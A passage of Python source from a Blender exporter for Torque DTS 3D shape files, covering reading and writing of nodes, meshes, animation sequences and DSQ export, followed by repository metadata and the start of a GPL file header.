self.sTable = StringTable() # String Table
self.defaultRotations = [] # Default node rotations
self.defaultTranslations = [] # Default node translations
self.nodeTranslations = [] # Node translations
self.nodeRotations = [] # Node rotations
self.nodeUniformScales = array('f') # Node scales (uniform)
self.nodeAlignedScales = [] # Node scales (aligned)
self.nodeAbitraryScaleFactors = [] # Node scale factors
self.nodeAbitraryScaleRots = [] # Node scale quats
self.groundTranslations = [] # Ground translation frames
self.groundRotations = [] # Ground rotation frames
self.morphs = [] # Morph initial data
self.morphSettings = array('f') # Morph frames
self.alphain = array('f') # Used for detail blending
self.alphaout = array('f') # Used for detail blending
self.mPreviousMerge = []
self.mExportMerge = False
self.mSmallestVisibleSize = 0 # Smallest visible size (approximation)
self.mSmallestVisibleDL = 0
def __del__(self):
clearArray(self.meshes)
del self.nodes
clearArray(self.sequences)
del self.triggers
del self.objects
del self.objectstates
del self.iflmaterials
del self.subshapes
del self.detaillevels
del self.decals
del self.decalstates
del self.materials
del self.defaultRotations
del self.defaultTranslations
del self.nodeTranslations
del self.nodeRotations
del self.nodeUniformScales
del self.nodeAlignedScales
del self.nodeAbitraryScaleFactors
del self.nodeAbitraryScaleRots
del self.groundTranslations
del self.groundRotations
del self.morphs
del self.morphSettings
del self.alphain
del self.alphaout
del self.mPreviousMerge
del self.sTable
def checkSkip(self, meshNum, curObject, curDecal, skipDL):
# More or less a translation of the C++ code
# 0 = false, 1 = true
if skipDL == 0:
return False # easy out...
# Skip detail level exists on this subshape
skipSS = self.detaillevels[skipDL].subshape
if curObject < len(self.objects):
start = self.objects[curObject].firstMesh
if meshNum >= start:
# We are either from this object, the next object, or a decal
if meshNum < start + self.objects[curObject].numMeshes:
# This Object...
if self.subshapes[skipSS].firstObject > curObject:
# Haven't reached this subshape yet
return True
if (len(self.subshapes) == skipSS + 1) or (curObject < self.subshapes[skipSS + 1].firstObject):
# curObject is on the subshape of a skip detail...make sure it's after skipDL
if meshNum - start < self.detaillevels[skipDL].objectDetail:
return True
else:
return False
# if we get here, then curObject occurs on a subShape after skip detail (so keep it)
return False
else:
return self.checkSkip(meshNum, curObject + 1, curDecal, skipDL)
if curDecal < len(self.decals):
start = self.decals[curDecal].firstMesh
if meshNum >= start:
# we are either from this decal, the next decal, or error
if meshNum < start + self.decals[curDecal].numMeshes:
# this object...
if self.subshapes[skipSS].firstDecal > curDecal:
# haven't reached this subshape yet
return True
if (len(self.subshapes) == skipSS + 1) or (curDecal < self.subshapes[skipSS + 1].firstDecal):
# curDecal is on subshape of skip detail...make sure it's after skipDL
if meshNum - start < self.detaillevels[skipDL].objectDetail:
return True
else:
return False
else:
# if we get here, then curDecal ocurrs on subShape after skip detail (so keep it)
return False
else:
# advance decal, try again
return self.checkSkip(meshNum, curObject, curDecal + 1, skipDL)
return False
def write(self, dstream):
# In this function, we write to the dstream, flush it, then write_end
# Write Counts...
dstream.writes32(len(self.nodes))
dstream.writes32(len(self.objects))
dstream.writes32(len(self.decals))
dstream.writes32(len(self.subshapes))
dstream.writes32(len(self.iflmaterials))
dstream.writes32(len(self.nodeRotations))
dstream.writes32(len(self.nodeTranslations))
dstream.writes32(len(self.nodeUniformScales))
dstream.writes32(len(self.nodeAlignedScales))
dstream.writes32(len(self.nodeAbitraryScaleFactors)) # Both scale's must be same length
dstream.writes32(len(self.groundRotations))
dstream.writes32(len(self.objectstates))
dstream.writes32(len(self.decalstates))
dstream.writes32(len(self.triggers))
dstream.writes32(len(self.detaillevels))
dstream.writeu32(len(self.meshes))
dstream.writes32(len(self.sTable.strings))
dstream.writes32(self.mSmallestVisibleSize) # This is typecasted to F32, but isn't a float when stored
dstream.writes32(self.mSmallestVisibleDL)
# Morphs
if dstream.DTSVersion > 24:
# Note: appears to be redundancy here...
dstream.writes32(len(self.morphs))
dstream.writes32(len(self.morphs))
dstream.writes32(len(self.morphSettings))
dstream.storeCheck()
# Write Bounds...
dstream.writef32(self.radius)
dstream.writef32(self.tubeRadius)
dstream.writePoint3F(self.center)
dstream.writeBox(self.bounds)
dstream.storeCheck()
# Write Various Vectors...
# Write Nodes
for cnt in self.nodes:
dstream.writeNode(cnt)
dstream.storeCheck()
# Write Objects
for cnt in self.objects:
dstream.writeObject(cnt)
dstream.storeCheck()
# Write Decals
for cnt in self.decals:
dstream.writeDecal(cnt)
dstream.storeCheck()
# Write Ifl Materials
for cnt in self.iflmaterials:
dstream.writeIflMaterial(cnt)
dstream.storeCheck()
# Write SubShapes
for shape in self.subshapes:
# first* and num*
dstream.writes32(shape.firstNode)
for shape in self.subshapes:
dstream.writes32(shape.firstObject)
for shape in self.subshapes:
dstream.writes32(shape.firstDecal)
dstream.storeCheck()
for shape in self.subshapes:
dstream.writes32(shape.numNodes)
for shape in self.subshapes:
dstream.writes32(shape.numObjects)
for shape in self.subshapes:
dstream.writes32(shape.numDecals)
dstream.storeCheck()
# Get default translation and rotation...
for cnt in range(0, len(self.defaultRotations)): # Same length as default translations
dstream.writeQuat16(self.defaultRotations[cnt])
dstream.writePoint3F(self.defaultTranslations[cnt])
# Get any node sequence data stored in shape
for cnt in self.nodeTranslations:
dstream.writePoint3F(cnt)
for cnt in self.nodeRotations:
dstream.writeQuat16(cnt)
dstream.storeCheck()
# More node sequence data...scale
for cnt in self.nodeUniformScales:
dstream.writef32(cnt)
for cnt in self.nodeAlignedScales:
dstream.writePoint3F(cnt)
for cnt in self.nodeAbitraryScaleFactors:
dstream.writePoint3F(cnt)
for cnt in self.nodeAbitraryScaleRots:
dstream.writeQuat16(cnt)
dstream.storeCheck()
for cnt in self.groundTranslations:
dstream.writePoint3F(cnt)
for cnt in self.groundRotations:
dstream.writeQuat16(cnt)
dstream.storeCheck()
# Object States
for cnt in self.objectstates:
dstream.writeObjectState(cnt)
dstream.storeCheck()
# Decal States
for cnt in self.decalstates:
dstream.writeDecalState(cnt)
dstream.storeCheck()
# Frame Triggers
for cnt in self.triggers:
dstream.writeTrigger(cnt)
dstream.storeCheck()
# Details
for cnt in self.detaillevels:
dstream.writeDetailLevel(cnt)
dstream.storeCheck()
# Meshes
for msh in self.meshes:
dstream.writeu32(int(msh.mtype)) # Write Mesh Type
msh.write(dstream)
dstream.storeCheck()
# Morphs
if dstream.DTSVersion > 24:
for morph in self.morphs:
dstream.writeMorph(morph)
for morph in self.morphs:
dstream.writef32(morph.initialValue)
for morphset in self.morphSettings:
dstream.writef32(morphset)
dstream.storeCheck()
# Names
for cnt in self.sTable.strings:
dstream.writeStringt(cnt)
dstream.storeCheck()
# ...
# Flush. Needed here
dstream.flush()
self.write_end(dstream) # And write the rest of the story
def write_end(self, dstream):
# Write Sequences and Materials HERE
dstream.fs.write(struct.pack('<i', len(self.sequences))) # S32
for seq in self.sequences:
seq.write(dstream.fs, dstream.DTSVersion)
# Write Material List
self.materials.write(dstream.fs)
def read(self, dstream):
# Read in a shape. Calls the mesh read, and soforth
Torque_Util.dump_writeln("Reading in Sequences and Materials")
# First, we need to read in sequences (not in memory buffers, is at end of the file)...
numSequences = struct.unpack('<i', dstream.fs.read(calcsize('<i')))[0] # S32
for seq in range(0, numSequences): # ^^ as usual, this spits out an annoying array
sq = Sequence()
sq.read(dstream.fs, dstream.DTSVersion)
self.sequences.append(sq)
# Read Material List
self.materials.read(dstream.fs)
Torque_Util.dump_writeln("Reading in from streams...")
## >> End of normal file reading <<##
# Get Counts...
numNodes = dstream.reads32() # S32 numNodes = alloc.get32();
numObjects = dstream.reads32() # S32 numObjects = alloc.get32();
numDecals = dstream.reads32() # S32 numDecals = alloc.get32();
numSubShapes = dstream.reads32() # S32 numSubShapes = alloc.get32();
numIflMaterials = dstream.reads32() # S32 numIflMaterials = alloc.get32();
numNodeRots = dstream.reads32() # S32 numNodeRots = alloc.get32();
numNodeTrans = dstream.reads32() # S32 numNodeTrans = alloc.get32();
numNodeUniformScales = dstream.reads32() # S32 numNodeUniformScales = alloc.get32();
numNodeAlignedScales = dstream.reads32() # S32 numNodeAlignedScales = alloc.get32();
numNodeArbitraryScales = dstream.reads32() # S32 numNodeArbitraryScales = alloc.get32();
numGroundFrames = dstream.reads32() # S32 numGroundFrames = alloc.get32();
numObjectStates = dstream.reads32() # S32 numObjectStates = alloc.get32();
numDecalStates = dstream.reads32() # S32 numDecalStates = alloc.get32();
numTriggers = dstream.reads32() # S32 numTriggers = alloc.get32();
numDetails = dstream.reads32() # S32 numDetails = alloc.get32();
numMeshes = dstream.reads32() # S32 numMeshes = alloc.get32();
numNames = dstream.reads32()
self.mSmallestVisibleSize = dstream.reads32() # Not a float
self.mSmallestVisibleDL = dstream.reads32()
skipDL = min(self.mSmallestVisibleDL, self.smNumSkipLoadDetails)
# Morphs
# if dstream.DTSVersion > 24:
# # Note: appears to be redundancy here...
# numMorphs = dstream.reads32()
# numDefMorphs = dstream.reads32()
# if numMorphs != numDefMorphs:
# Torque_Util.dump_writeErr("Error: Morph number mismatch (%d morphs for %d defaults)" % (numMorphs, numDefMorphs))
# return
#
# numMorphSettings = dstream.reads32()
dstream.readCheck()
# get bounds
self.radius = dstream.readf32()
self.tubeRadius = dstream.readf32()
self.center = dstream.readPoint3F()
self.bounds = dstream.readBox()
dstream.readCheck()
# Copy Various Vectors...
# Read in Nodes
for cnt in range(0, numNodes):
self.nodes.append(dstream.readNode())
dstream.readCheck()
# Read in Objects
for cnt in range(0, numObjects):
self.objects.append(dstream.readObject())
dstream.readCheck()
# Read in Decals
for cnt in range(0, numDecals):
self.decals.append(dstream.readDecal())
dstream.readCheck()
# Read in Ifl Materials
for cnt in range(0, numIflMaterials):
self.iflmaterials.append(dstream.readIflMaterial())
dstream.readCheck()
# Read in subShapes
# A tad more complex since the file stores everything seperatly
afirstNode = []
afirstObject = []
afirstDecal = []
anumNodes = []
anumObjects = []
anumDecals = []
for cnt in range(0, numSubShapes):
afirstNode.append(dstream.reads32())
for cnt in range(0, numSubShapes):
afirstObject.append(dstream.reads32())
for cnt in range(0, numSubShapes):
afirstDecal.append(dstream.reads32())
dstream.readCheck()
for cnt in range(0, numSubShapes):
anumNodes.append(dstream.reads32())
for cnt in range(0, numSubShapes):
anumObjects.append(dstream.reads32())
for cnt in range(0, numSubShapes):
anumDecals.append(dstream.reads32())
for cnt in range(0, numSubShapes):
# Finally, add the subshapes
self.subshapes.append(
SubShape(afirstNode[cnt], afirstObject[cnt], afirstDecal[cnt], anumNodes[cnt], anumObjects[cnt],
anumDecals[cnt]))
dstream.readCheck()
# Cleanup
del afirstNode
del afirstObject
del afirstDecal
del anumNodes
del anumObjects
del anumDecals
# No need to read meshIndexList
# Get default translation and rotation...
for cnt in range(0, numNodes):
self.defaultRotations.append(dstream.readQuat16())
self.defaultTranslations.append(dstream.readPoint3F())
# Get any node sequence data stored in shape
for cnt in range(0, numNodeTrans):
self.nodeTranslations.append(dstream.readPoint3F())
for cnt in range(0, numNodeRots):
self.nodeRotations.append(dstream.readQuat16())
dstream.readCheck()
# More node sequence data...scale
for cnt in range(0, numNodeUniformScales):
self.nodeUniformScales.append(dstream.readf32()) # F32
for cnt in range(0, numNodeAlignedScales):
self.nodeAlignedScales.append(dstream.readPoint3F())
for cnt in range(0, numNodeArbitraryScales):
self.nodeArbitraryScaleFactors.append(dstream.readPoint3F())
for cnt in range(0, numNodeArbitraryScales):
self.nodeArbitraryScaleRots.append(dstream.readQuat16())
dstream.readCheck()
# version 22 & 23 shapes accidentally had no ground transforms, and ground for
# earlier shapes is handled just above, so...
for cnt in range(0, numGroundFrames):
self.groundTranslations.append(dstream.readPoint3F())
for cnt in range(0, numGroundFrames):
self.groundRotations.append(dstream.readQuat16())
dstream.readCheck()
# Object States
for cnt in range(0, numObjectStates):
self.objectstates.append(dstream.readObjectState())
dstream.readCheck()
# Decal States
for cnt in range(0, numDecalStates):
self.decalstates.append(dstream.readDecalState())
dstream.readCheck()
# Frame Triggers
for cnt in range(0, numTriggers):
self.triggers.append(dstream.readTrigger())
dstream.readCheck()
# Details
for cnt in range(0, numDetails):
self.detaillevels.append(dstream.readDetailLevel())
dstream.readCheck()
# Meshes
# about to read in the meshes...first must allocate some scratch space
# ^^ We are not doing it in python though
Torque_Util.dump_writeln("Reading in Meshes...")
# Read in Meshes (sans skins)...
# Straight forward read one at a time
curObject, curDecal = 0, 0 # For tracking skipped meshes
for cnt in range(0, numMeshes):
skip = False # self.checkSkip(cnt, curObject, curDecal, skipDL)
mesh = DtsMesh()
mesh.mtype = dstream.readu32() # U32 Type of Mesh
Torque_Util.dump_writeln("Found Mesh")
if not skip:
Torque_Util.dump_writeln("Reading...")
val = mesh.read(dstream, self)
if (val != 1) and (mesh.mtype != 4):
Torque_Util.dump_writeErr("Error Reading Mesh!")
return None
self.meshes.append(mesh)
dstream.readCheck()
Torque_Util.dump_writeln("Finished Reading Meshes")
# Morphs
# if dstream.DTSVersion > 24:
# for cnt in range(0, numMorphs):
# self.morphs.append(dstream.readMorph())
# for cnt in range(0, numDefMorphs):
# self.morphs[cnt].initialValue = dstream.readf32()
# for cnt in range(0, numMorphSettings):
# self.morphSettings.append(dstream.readf32())
# dstream.readCheck()
# Read in names to our private string table...
for cnt in range(0, numNames):
self.sTable.addString(dstream.readStringt())
dstream.readCheck()
# allocate storage space for some arrays (filled in during Shape::init)...
# for cnt in range(0, numDetails):
# self.alphain.append(dstream.readf32())
# for cnt in range(0, numDetails):
# self.alphaout.append(dstream.readf32())
for cnt in range(0, numObjects):
self.mPreviousMerge.append(-1)
self.mExportMerge = dstream.DTSVersion >= 23;
def getBounds(self):
return self.bounds
def getRadius(self):
return self.radius
def getTubeRadius(self):
return self.tubeRadius
def addName(self, s):
return self.sTable.addString(s)
def getName(self, idx):
return self.sTable.get(idx)
def calculateBounds(self):
if len(self.objects) == 0:
return
self.bounds.max = Vector(-10e30, -10e30, -10e30)
self.bounds.min = Vector(10e30, 10e30, 10e30)
# Iterate through the objects instead of the meshes
# so we can easily get the default transforms.
for ob in range(0, len(self.objects)):
object = self.objects[ob]
trans = Vector()
rot = Quaternion()
trans, rot = self.getNodeWorldPosRot(object.node)
for j in range(0, object.numMeshes):
bounds2 = self.meshes[object.firstMesh + j].getBounds(trans, rot)
self.bounds.min[0] = min(self.bounds.min.x(), bounds2.min.x())
self.bounds.min[1] = min(self.bounds.min.y(), bounds2.min.y())
self.bounds.min[2] = min(self.bounds.min.z(), bounds2.min.z())
self.bounds.max[0] = max(self.bounds.max.x(), bounds2.max.x())
self.bounds.max[1] = max(self.bounds.max.y(), bounds2.max.y())
self.bounds.max[2] = max(self.bounds.max.z(), bounds2.max.z())
def calculateRadius(self):
maxRadius = float(0.0)
for i in range(0, len(self.objects)):
object = self.objects[i]
trans = Vector()
rot = Quaternion()
trans, rot = self.getNodeWorldPosRot(object.node)
for j in range(0, object.numMeshes):
mesh = self.meshes[object.firstMesh + j]
meshRadius = mesh.getRadiusFrom(trans, rot, self.center)
if meshRadius > maxRadius: # stupid typo. Fixed!
maxRadius = meshRadius
self.radius = maxRadius
def calculateTubeRadius(self):
maxRadius = float(0.0)
for ob in self.objects:
trans = Vector2()
rot = Quaternion()
trans, rot = self.getNodeWorldPosRot(ob.node)
for j in range(0, ob.numMeshes):
mesh = self.meshes[ob.firstMesh + j]
meshRadius = mesh.getTubeRadiusFrom(trans, rot, self.center)
if meshRadius > maxRadius:
maxRadius = meshRadius
self.tubeRadius = maxRadius
def calculateCenter(self):
self.center = self.bounds.max.midpoint(self.bounds.min)
def setSmallestSize(self, i):
# Assumes detail levels are going from biggest -> smallest
if i < 1.0: i = 1.0
self.mSmallestVisibleSize = i
self.mSmallestVisibleDL = -1
foundSmallest = 9999
for det in range(0, len(self.detaillevels)):
# Select a detail level that is smaller than the current, yet bigger than the absolute smallest.
# Also make sure we don't select billboard details.
if (self.detaillevels[det].size >= self.mSmallestVisibleSize) and (
self.detaillevels[det].size < foundSmallest):
foundSmallest = self.detaillevels[det].size
self.mSmallestVisibleDL = det
# Fix any bad values
if self.mSmallestVisibleDL < 0: self.mSmallestVisibleDL = 0 # Must at least be 0
def calcSmallestSize(self):
# Assumes detail levels are going from biggest -> smallest
self.mSmallestVisibleDL = -1
self.mSmallestVisibleSize = 9999
for det in range(0, len(self.detaillevels)):
# Select a detail level that is smaller than the current, yet bigger than the absolute smallest.
# Also make sure we don't select billboard details.
if (self.detaillevels[det].size >= 0) and (self.detaillevels[det].size < self.mSmallestVisibleSize):
self.mSmallestVisibleDL = det
self.mSmallestVisibleSize = int(self.detaillevels[det].size)
# Fix any bad values
if self.mSmallestVisibleDL < 0: self.mSmallestVisibleDL = 0 # Must at least be 0
if self.mSmallestVisibleSize == 9999: self.mSmallestVisibleSize = 0
def setCenter(self, p):
self.center = p
def getNodeWorldPosRot(self, n):
# Build total translation & rotation for this node
nidx = []
nidx.append(n)
nid = n
while ((self.nodes[nid].parent) >= 0):
nid = self.nodes[nid].parent
nidx.insert(0, nid)
trans = Vector(0, 0, 0)
rot = Quaternion(0, 0, 0, 1)
for nod in nidx:
trans += rot.apply(self.defaultTranslations[nod])
rot = self.defaultRotations[nod] * rot
return trans, rot
def materialExists(self, name):
return self.materials.materialExists(name)
def printInfo(self):
Torque_Util.dump_writeln("Stats for Shape")
Torque_Util.dump_writeln("***************")
Torque_Util.dump_writeln("nodes : %d" % len(self.nodes))
Torque_Util.dump_writeln("objects : %d" % len(self.objects))
Torque_Util.dump_writeln("decals : %d" % len(self.decals))
Torque_Util.dump_writeln("subshapes : %d" % len(self.subshapes))
Torque_Util.dump_writeln("ifl materials : %d" % len(self.iflmaterials))
Torque_Util.dump_writeln("node rotations : %d" % len(self.nodeRotations))
Torque_Util.dump_writeln("node translations : %d" % len(self.nodeTranslations))
Torque_Util.dump_writeln("node uniform scales : %d" % len(self.nodeUniformScales))
Torque_Util.dump_writeln("node aligned scales : %d" % len(self.nodeAlignedScales))
Torque_Util.dump_writeln("node abitrary scales : %d" % len(self.nodeAbitraryScaleFactors))
Torque_Util.dump_writeln("morphs : %d" % len(self.morphs))
Torque_Util.dump_writeln("ground frames : %d" % len(self.groundTranslations))
Torque_Util.dump_writeln("morph frames: %d" % len(self.morphSettings))
Torque_Util.dump_writeln("object states : %d" % len(self.objectstates))
Torque_Util.dump_writeln("decal states : %d" % len(self.decalstates))
Torque_Util.dump_writeln("triggers : %d" % len(self.triggers))
Torque_Util.dump_writeln("detail levels : %d" % len(self.detaillevels))
Torque_Util.dump_writeln("meshes : %d" % len(self.meshes))
Torque_Util.dump_writeln("names : %d" % len(self.sTable.strings))
for n in self.sTable.strings:
Torque_Util.dump_writeln(" %s" % n.tostring())
Torque_Util.dump_writeln("smallest visible size : %d" % self.mSmallestVisibleSize)
Torque_Util.dump_writeln("smallest visible DL : %d" % self.mSmallestVisibleDL)
Torque_Util.dump_writeln("radius : %f" % self.radius)
Torque_Util.dump_writeln("tube radius : %f" % self.tubeRadius)
Torque_Util.dump_writeln("center : (%f %f %f)" % (self.center[0], self.center[1], self.center[2]))
Torque_Util.dump_writeln("bounds : (%f %f %f) (%f %f %f)" % (
self.bounds.min[0], self.bounds.min[1], self.bounds.min[2], self.bounds.max[0], self.bounds.max[1],
self.bounds.max[2]))
Torque_Util.dump_writeln("End Stats")
def clearDynamicData(self):
pass
def init(self):
self.clearDynamicData()
# Clear any bogus node info
for i in self.nodes:
i.firstObject = i.firstChild = i.nextSibling = -1
# Fill in node info :
for i in range(0, len(self.nodes)):
parentId = self.nodes[i].parent
if parent >= 0:
if self.nodes[parentId].firstChild < 0:
self.nodes[parentId].firstChild = i
else:
child = self.nodes[parentId].firstChild
while self.nodes[child].nextSibling >= 0:
child = self.nodes[child].nextSibling
self.nodes[child].nextSibling = i
# Fill in object info :
for i in range(0, len(self.objects)):
self.objects[i].sibling = -1
self.objects[i].firstDecal = -1
nodeIndex = self.objects[i].node
if nodeIndex >= 0:
if self.nodes[nodeIndex].firstObject < 0:
self.nodes[nodeIndex].firstObject = i
else:
objectIndex = self.nodes[nodeIndex].firstObject
while self.objects[objectIndex].nextSibling >= 0:
objectIndex = self.objects[objectIndex].nextSibling
self.objects[objectIndex].sibling = i
# Fill in decal info :
for i in range(0, len(self.decals)):
self.decals[i].sibling = -1
objectIndex = self.decals[i].object
if self.objects[objectIndex].firstDecal < 0: # must set objects decal to this
self.objects[objectIndex].firstDecal = i
else:
decalIndex = self.objects[objectIndex].firstDecal
while self.decals[decalIndex].sibling >= 0:
decalIndex = self.decals[decalIndex].sibling
self.decals[decalIndex].sibling = i
# Fill in sequence data :
mFlags = 0
'''
for in in range(0, len(self.sequences)):
if not self.sequences[i].animatesScale:
continue
curVal = mFlags & AnyScale
newVal = self.sequences[i].flags & AnyScale
mFlags &= ~(AnyScale)
mFlags |= max(curVal, NewVal)
'''
for i in range(0, len(self.detaillevels)):
if self.detaillevels[i].size < 0:
print("TODO 1") # Not implemented creation of these lists yet!!
# self.alphaIn[i] = 0.0
# self.alphaOut[i] = 0.0
elif i + 1 == len(self.detaillevels) or self.detaillevels[i + 1].size < 0:
print("TODO 2")
# self.alphaIn[i] = 0.0
# self.alphaOut[i] = smAlphaOutLastDetail
else:
if self.detaillevels[i + 1].subshape < 0:
print("TODO 3")
# billboard detail special
# self.alphaIn[i] = smAlphaInBillboard
# self.alphaOut[i] = smAlphaOutBillboard
else:
print("TODO 4")
# Normal detail next
# self.alphaIn[i] = smAlphaInDefault
# self.alphaOut[i] = smAlphaOutDefault
# Fixes up subshape # and object detail #
for i in range(0, self.mSmallestVisibleDL - 1):
if i < self.smNumSkipLoadDetails:
# detail levels renders when pixel size > cap
# zap meshes + decals associated with it and
# use next detail level instead
ss = self.detaillevels[i].subshape
od = self.detaillevels[i].objectDetail
if ss == self.detaillevels[i + 1].subshape and od == self.detaillevels[i + 1].objectDetail:
# already done? (init supposedly called multiple times??)
continue
self.detaillevels[i].subshape = self.detaillevels[i + 1].subshape
self.detaillevels[i].objectDetail = self.detaillevels[i + 1].objectDetail
# Calculates polycount on detail levels
for i in range(0, len(self.detaillevels)):
count = 0
ss = self.detaillevels[i].subshape
od = self.detaillevels[i].objectDetail
if ss < 0:
# billboard
count += 2
continue
start = self.subshapes[ss].firstObject
end = start + self.subshapes[ss].numObjects
for j in range(start, end):
object = self.objects[j]
if od < object.numMeshes:
mesh = self.meshes[object.firstMesh + od]
count += mesh.getPolyCount()
self.detaillevels[i].polyCount = count
# Init the collision accelerator array << Probably don't need this for what we're doing!!
# for dca in range(0, len(self.detailCollisionAccelerators):
# print "BOO"
# Here we calculate a merge buffer size... probably don't need this anyway
mMergeBufferSize = 0
for i in range(0, len(self.meshes)):
object = self.objects[i]
maxSize = 0
for dl in range(0, object.numMeshes):
mesh = self.meshes[object.firstMesh + dl]
maxSize = getMax(maxSize, len(mesh.mindices)) # mindices = MERGE indices?
mMergeBufferSize += maxSize
self.initMaterialList()
# Now that was exciting
def initMaterialList(self):
# loops through subshapes finding translucent objects...
pass
# Following functions for DSQ Support
def writeDSQSequence(self, fs, sequence, version):
fs.write(struct.pack('<i', version)) # S32, version 24 currently
nodes_used = sequence.getNodes()
node_rots = sequence.countNodes(0)
node_locs = sequence.countNodes(1)
node_scales = sequence.countNodes(2)
new_rot_matters = []
new_loc_matters = []
new_scale_matters = []
# Write node names
# -- this is how we will map imported sequence nodes to shape nodes
# Do not write node names not affected by animation
fs.write(struct.pack('<i', len(nodes_used)))
cur_writ = 0
for n in nodes_used:
# Write the node, since its a part of the sequence
if self.nodes[n].name != -1:
fs.write(struct.pack('<i', len(self.sTable.strings[self.nodes[n].name])))
self.sTable.strings[self.nodes[n].name].tofile(fs)
else:
fs.write(struct.pack('<i', 0)) # No length, -1 index!
# Warning : do not name more than 1 node -1 index!
# Add to the new matters list
new_rot_matters.append(sequence.matters_rotation[n])
new_loc_matters.append(sequence.matters_translation[n])
new_scale_matters.append(sequence.matters_scale[n])
cur_writ += 1
if len(nodes_used) != sequence.countNodes():
# This should never happen
Torque_Util.dump_writeWarning(
"Warning : node list size mismatch! Expecting %d nodes, but got %d. Sequence may not load." % (
sequence.countNodes(), len(nodes_used)))
sequence.matters_rotation = new_rot_matters
sequence.matters_translation = new_loc_matters
sequence.matters_scale = new_scale_matters
# legacy write -- write zero objects, don't pretend to support object export anymore
fs.write(struct.pack('<i', 1337)) # S32
# On import, we will need to adjust keyframe data based on number of
# nodes/objects in this shape...number of nodes can be inferred from
# above, but number of objects cannot be. Write that quantity here:
fs.write(struct.pack('<i', len(self.objects))) # S32
# Calculate bases
# (All need to start from 0)
if sequence.baseRotation < 0:
baseRotation = 0
else:
baseRotation = sequence.baseRotation
if sequence.baseTranslation < 0:
baseTranslation = 0
else:
baseTranslation = sequence.baseTranslation
if sequence.baseScale < 0:
baseScale = 0
else:
baseScale = sequence.baseScale
if sequence.firstGroundFrame < 0:
baseGround = 0
else:
baseGround = sequence.firstGroundFrame
baseTrigger = sequence.firstTrigger
# Write node states -- skip default node states
fs.write(struct.pack('<i', node_rots * sequence.numKeyFrames)) # S32
for n in self.nodeRotations[baseRotation:baseRotation + (node_rots * sequence.numKeyFrames)]:
q16 = n.toQuat16() # << Remember its Quat16's!
# Check if we are out of bounds
if q16.x > 32767:
q16.x = 32767
elif q16.x < -32768:
q16.x = -32768
elif q16.y > 32767:
q16.y = 32767
elif q16.y < -32768:
q16.y = -32768
elif q16.z > 32767:
q16.z = 32767
elif q16.z < -32768:
q16.z = -32768
elif q16.w > 32767:
q16.w = 32767
elif q16.w < -32768:
q16.w = -32768
fs.write(struct.pack('<h', q16[0])) # F32 x
fs.write(struct.pack('<h', q16[1])) # F32 y
fs.write(struct.pack('<h', q16[2])) # F32 z
fs.write(struct.pack('<h', q16[3])) # F32 w
fs.write(struct.pack('<i', node_locs * sequence.numKeyFrames)) # S32
for n in self.nodeTranslations[baseTranslation:baseTranslation + (node_locs * sequence.numKeyFrames)]:
fs.write(struct.pack('<f', n[0])) # F32 x
fs.write(struct.pack('<f', n[1])) # F32 y
fs.write(struct.pack('<f', n[2])) # F32 z
if sequence.flags & Sequence.UniformScale:
fs.write(struct.pack('<i', node_scales * sequence.numKeyFrames)) # S32
for n in self.nodeUniformScales[baseScale:baseScale + (node_scales * sequence.numKeyFrames)]:
fs.write(struct.pack('<f', self.nodeUniformScales))
else:
fs.write(struct.pack('<i', 0))
if sequence.flags & Sequence.AlignedScale:
fs.write(struct.pack('<i', node_scales * sequence.numKeyFrames)) # S32
for n in self.nodeAlignedScales[baseScale:baseScale + (node_scales * sequence.numKeyFrames)]:
fs.write(struct.pack('<f', n[0])) # X
fs.write(struct.pack('<f', n[1])) # Y
fs.write(struct.pack('<f', n[2])) # Z
else:
fs.write(struct.pack('<i', 0))
if sequence.flags & Sequence.ArbitraryScale:
fs.write(struct.pack('<i', node_scales * sequence.numKeyFrames)) # S32
for n in self.nodeAbitraryScaleRots[baseScale:baseScale + (node_scales * sequence.numKeyFrames)]:
q16 = Quat16(n)
fs.write(struct.pack('<h', q16[0])) # X
fs.write(struct.pack('<h', q16[1])) # Y
fs.write(struct.pack('<h', q16[2])) # Z
fs.write(struct.pack('<h', q16[3])) # W
for n in self.nodeAbitraryScaleFactors[baseScale:baseScale + (node_scales * sequence.numKeyFrames)]:
fs.write(struct.pack('<f', n[0])) # X
fs.write(struct.pack('<f', n[1])) # Y
fs.write(struct.pack('<f', n[2])) # Z
else:
fs.write(struct.pack('<i', 0))
fs.write(struct.pack('<i', sequence.numGroundFrames)) # S32
for n in self.groundTranslations[baseGround:baseGround + sequence.numGroundFrames]:
fs.write(struct.pack('<f', n[0])) # X
fs.write(struct.pack('<f', n[1])) # Y
fs.write(struct.pack('<f', n[2])) # Z
for n in self.groundRotations[baseGround:baseGround + sequence.numGroundFrames]:
q16 = Quat16(n)
fs.write(struct.pack('<h', q16[0])) # X
fs.write(struct.pack('<h', q16[1])) # Y
fs.write(struct.pack('<h', q16[2])) # Z
fs.write(struct.pack('<h', q16[3])) # W
# write object states -- legacy..no object states
fs.write(struct.pack('<i', 0))
# Also set the bases accordingly
if sequence.baseRotation > 0: sequence.baseRotation = 0
if sequence.baseTranslation > 0: sequence.baseTranslation = 0
if sequence.baseScale > 0: sequence.baseScale = 0
if sequence.firstGroundFrame > 0: sequence.firstGroundFrame = 0
if sequence.firstTrigger > 0: sequence.firstTrigger = 0
# Write Sequence
fs.write(struct.pack('<i', 1))
if sequence.nameIndex != -1:
fs.write(struct.pack('<i', len(self.sTable.strings[sequence.nameIndex])))
self.sTable.strings[sequence.nameIndex].tofile(fs)
else:
fs.write(0x00)
# Now write the sequence itself
sequence.write(fs, version, True)
# write out all the triggers...
if baseTrigger > -1:
fs.write(struct.pack('<i', sequence.numTriggers))
for t in self.triggers[baseTrigger:baseTrigger + sequence.numTriggers]:
fs.write(struct.pack('<I', t.state)) # U32
fs.write(struct.pack('<f', t.pos)) # F32
else:
fs.write(struct.pack('<i', 0)) # S32
def readDSQSequences(self):
Torque_Util.dump_writeln("TODO: Shape.readDSQSequences")
# We do not need to implement this for the exporter
|
pchan126/Blender_DTS_30
|
DTSPython/Dts_Shape.py
|
Python
|
mit
| 52,893
|
[
"exciting"
] |
728f1caf6e93f8e8137e1ac01b0d148cf022586f1338242259108fad3b6f83f9
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# --- BEGIN_HEADER ---
#
# editor - [insert a few words of module description on this line]
# Copyright (C) 2003-2009 The MiG Project lead by Brian Vinter
#
# This file is part of MiG.
#
# MiG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MiG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
